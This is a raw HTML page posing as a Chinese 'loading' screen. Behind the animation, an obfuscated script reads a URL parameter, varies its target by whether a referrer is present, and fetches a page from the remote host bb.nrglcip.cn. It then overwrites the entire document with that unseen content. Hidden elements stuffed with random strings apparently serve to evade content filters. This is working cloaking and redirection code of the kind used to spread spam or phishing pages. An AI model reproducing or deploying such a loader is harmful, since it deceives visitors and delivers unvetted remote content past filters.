<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Lr8iqYU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Lr8iqYU .C59pXqu2cDp {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Lr8iqYU .content {
            line-height: 50px;
            text-align: center
        }

        .Lr8iqYU .img {
            width: 100%
        }

        .Lr8iqYU .nPvt5Y13EDx {
            text-align: center
        }

        .Lr8iqYU .nPvt5Y13EDx span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Lr8iqYU .nPvt5Y13EDx span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Lr8iqYU .nPvt5Y13EDx span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Lr8iqYU .nPvt5Y13EDx span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Lr8iqYU .nPvt5Y13EDx span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Lr8iqYU .nPvt5Y13EDx span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Lr8iqYU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Z8Da0tXsiE(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var VqCgs11 = Z8Da0tXsiE('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ VqCgs11 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ VqCgs11 +".html?a=share";
		}
		
        Ryd8fw=url+"#"+new Date().getTime();
        Ryd8fw && function() {
            $.get(Ryd8fw, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >l2iihMLGcJO4Ma5ycKpwpFcIhEiTar11Uus1lJK2CA9</h1>
<li style='display:none' >M4XxJIPot7mgGp2Cqamh6GdR4AmqGGTZ3DDpXLyfUFw9QHG7h3H7Cb8uhSKIGndFC3o2owR5WMwmLT</li>
<a  href='#' style='display:none'>lIOgzR5bKGgkZFFddY8JtW8tOHL8vIOwRjk1XPbsNa63COubCMtzqza0MONBgak8x3HfapVPdkuA</a>
<p  style='display:none'>w2kNPtR8AxlKrp2fm6vNbzr5I6sbi8fNHIWatS</p>
<div style='display:none'>okwSPUhArvnHVJBW638v2Ryx</div><div class="Lr8iqYU">
    <div class="C59pXqu2cDp">
        <div class="nPvt5Y13EDx">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >XmMGJy1kAvHcCeSjW2gcpxUU4wKgZwbl753mdy0UygsRlRklsvUCQZBc9AZX3IHfkSljOhhUPmMPD1ZR9rxw08cpLofSayV</b>
<h1 style='display:none' >IeSJsCZO7zYxXqsopRRIjpR6ZZw4Vr</h1>
<h1 style='display:none' >IeSJsCZO7zYxXqsopRRIjpR6ZZw4Vr</h1>
<h1 style='display:none' >IeSJsCZO7zYxXqsopRRIjpR6ZZw4Vr</h1>
<li style='display:none' >ZQ2mqvYW3X1EqEaTSImh3aGxJKEyWJecUHADqXuPoeLCAI0EeUNEkkaRKJZY8ECXdbpYGHq24OHCqqP1j30z2e</li>
<p  style='display:none'>UEBYUfi0ltpmLjS14TfRJcLT9l10QqP2nPDlpLpMGdlvhQ3lSwLCaJE0lB163gpmaAUH2DOLnP</p></body>
</html>